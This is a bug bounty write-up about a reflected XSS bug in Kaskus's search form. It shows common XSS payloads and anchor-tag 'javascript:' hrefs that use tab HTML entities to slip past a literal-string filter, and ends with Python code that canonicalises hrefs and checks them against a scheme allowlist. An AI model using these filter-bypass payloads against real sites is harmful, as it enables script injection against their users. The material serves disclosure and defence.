Reflected XSS Bypass Payloads with HTML Entities : Kaskus Bug Bounty

In bug bounty programs, security researchers often face the challenge of injecting XSS (Cross-Site Scripting) payloads into search forms. In this write-up, I will explain the steps I took and the results obtained while attempting to inject an XSS payload into a search form.

1. Trying Common XSS Payloads

In the initial stage, I tried several common basic XSS payloads, such as the following.

Payloads:
a. <script>alert()</script>
b. <svg onload=alert()>
c. <body onload=alert()>
d. <img src=x onerror=alert()>

Responses:

a. alert()
b. <svg>
c. <body>
d. <img src="x" alert()>

However, I found that none of these payloads executed: the system's filtering stripped the `<script>` tags and the event-handler attributes, as the responses above show.

2. Injecting Anchor Tags

To search for other potential security vulnerabilities, I decided to inject an XSS payload using an HTML link, specifically an anchor tag `<a>`. I attempted to use the payload `<a href="//google.com">XSS</a>`. As a result, the payload was successfully transformed into an embedded link, and when clicked, it redirected the user to the Google page.

3. Attempting a JavaScript Payload within an Anchor Tag

Since I had successfully injected an embedded link, I was intrigued to go further and inject JavaScript code into the link payload. I tried the payload:

<a href="javascript:alert()">XSS</a>

However, I discovered that the system modified the payload to:

<a href="[Removed]:alert()">XSS</a>

preventing the execution of JavaScript code.

4. Bypassing the JavaScript Filter Using the &Tab;, &#9;, or &#x09; Characters

Not giving up, I continued exploring ways to bypass the system's filtering of JavaScript code. Besides the `&Tab;` named entity, I also tried the other HTML entities that represent the tabulation (Tab) character.


I replaced the tabulation character with `&#9;` or `&#x09;`, modifying the payload to:

<a href="javas&Tab;cript:alert()">XSS</a>
<a href="javas&#9;cript:alert()">XSS</a>
<a href="javas&#x09;cript:alert()">XSS</a>

Responses: [screenshot omitted]
Alternatively, the entity can be inserted between every character of the scheme:

<a href="j&#9;a&#9;v&#9;a&#9;s&#9;c&#9;r&#9;i&#9;p&#9;t:alert()">XSS</a>
<a href="j&#x09;a&#x09;v&#x09;a&#x09;s&#x09;c&#x09;r&#x09;i&#x09;p&#x09;t:alert()">XSS</a>
<a href="j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t:alert()">XSS</a>

Responses: [screenshot omitted]

The system interpreted `&Tab;`, `&#9;` and `&#x09;` as tabulation characters during payload processing.

As a result, the filter no longer matched the `javascript:` scheme and left the payload intact, while the browser, which decodes the entities and ignores tab characters inside a URL, still executed it and triggered an XSS alert. This technique is an alternative way to evade filtering of JavaScript code within link payloads.

During security testing, researchers employ a variety of techniques and special characters to bypass filters and manipulate input. Using `&Tab;`, `&#9;`, or `&#x09;` inside a payload is one example of how a filter that matches only the literal string can be deceived, leaving a vulnerability undetected.
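To show why the literal-string filter described above fails and how a defender should check an `href` instead, here is an added example (my own code, not Kaskus's filter): a naive substring replacement beside a check that first decodes the entities once, as the HTML parser does, strips the tab and newline characters the URL parser ignores, and then allowlists the resulting scheme. The sample hrefs are constructed from the payload shapes in the write-up.

```python
import html
import re
from urllib.parse import urlsplit

# Browsers strip ASCII tab, LF and CR anywhere in a URL before parsing its
# scheme (WHATWG URL spec), which is why "javas\tcript:" still runs as JavaScript.
_URL_WHITESPACE = re.compile(r"[\t\n\r]")
_EDGE_CONTROLS = re.compile(r"^[\x00-\x20]+|[\x00-\x20]+$")

ALLOWED_SCHEMES = {"http", "https"}


def naive_filter(href: str) -> str:
    """Literal-substring filter of the kind the write-up describes: it rewrites
    the string 'javascript' to '[Removed]' but never decodes HTML entities."""
    return re.sub(r"javascript", "[Removed]", href, flags=re.IGNORECASE)


def canonical_href(href: str) -> str:
    """Normalise an href attribute value to what the browser will actually parse:
    decode entities exactly once (as the HTML parser does), then drop the
    whitespace the URL parser ignores and trim leading/trailing controls."""
    decoded = html.unescape(href)            # &Tab; &#9; &#x09; -> "\t"
    decoded = _URL_WHITESPACE.sub("", decoded)
    return _EDGE_CONTROLS.sub("", decoded)


def href_scheme(href: str) -> str:
    """Scheme of the canonical URL, lower-cased; '' for relative URLs."""
    return urlsplit(canonical_href(href)).scheme.lower()


def is_allowed_href(href: str) -> bool:
    """Allowlist check: relative URLs and known-safe schemes pass; everything
    else (javascript:, data:, vbscript:, ...) is rejected."""
    scheme = href_scheme(href)
    return scheme == "" or scheme in ALLOWED_SCHEMES


# Constructed sample hrefs, following the payload shapes in the write-up.
SAMPLES = [
    "javascript:alert()",
    "javas&Tab;cript:alert()",
    "javas&#9;cript:alert()",
    "javas&#x09;cript:alert()",
    "j&#9;a&#9;v&#9;a&#9;s&#9;c&#9;r&#9;i&#9;p&#9;t:alert()",
    "//google.com",
    "https://example.com/search?q=xss",
]


def compare_filters(hrefs=SAMPLES):
    """Per href: (naive filter changed it?, allowlist accepts it?)."""
    return {h: (naive_filter(h) != h, is_allowed_href(h)) for h in hrefs}
```

Only the plain `javascript:` sample is touched by the naive filter, whereas every entity-encoded variant canonicalises to the `javascript` scheme and is rejected by the allowlist.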

Proof of Concept